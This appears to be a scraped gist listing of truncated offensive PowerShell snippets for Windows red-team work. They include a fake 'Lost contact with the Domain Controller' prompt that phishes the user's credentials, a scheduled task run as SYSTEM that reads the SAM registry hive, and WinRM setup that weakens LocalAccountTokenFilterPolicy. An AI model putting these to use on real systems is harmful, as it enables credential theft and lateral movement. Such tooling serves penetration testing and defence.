This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Start-FileSystemMonitor { | |
<# | |
.SYNOPSIS | |
This function will monitor one or more file paths for any file | |
creation, deletion, modification, or renaming events. Data including | |
the change type, ACL for the file, etc. is output to the screen or | |
a specified -LogFile. | |
If -InjectShellCmd is specified, the given command is inserted into |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function New-SYSVOLZip { | |
<# | |
.SYNOPSIS | |
Compresses all folders/files in SYSVOL to a .zip file. | |
Author: Will Schroeder (@harmj0y) | |
License: BSD 3-Clause | |
Required Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-ThreadedFunction { | |
[CmdletBinding()] | |
param( | |
[Parameter(Position=0,Mandatory=$True)] | |
[String[]] | |
$ComputerName, | |
[Parameter(Position=1,Mandatory=$True)] | |
[System.Management.Automation.ScriptBlock] | |
$ScriptBlock, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Invoke-LockWorkStation { | |
# region define P/Invoke types dynamically | |
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 | |
# thanks matt and chris :) | |
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32') | |
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) | |
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class') | |
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# these functions all you to enumerate, add, and remove alternate data streams | |
# it can function as a bootleg replacement for Sysinternals' streams.exe | |
function Find-Streams { | |
<# | |
.SYNOPSIS | |
Enumerates all alternate data streams for a specified path. | |
If no path is provided, the current path is used. | |
Author: @harmj0y | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/ | |
# POC from greg.foss[at]owasp.org | |
function prompt { | |
Add-Type -AssemblyName Microsoft.VisualBasic | |
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720') | |
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name | |
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-LockWorkStation { | |
# region define P/Invoke types dynamically | |
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 | |
# thanks matt and chris :) | |
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32') | |
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) | |
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class') | |
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Run winrm quickconfig defaults | |
echo Y | winrm quickconfig | |
#Run enable psremoting command with defaults | |
Enable-PSRemoting -force | |
# adjust local token filter policy | |
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord | |
#Enabled Trusted Hosts for Universial Access |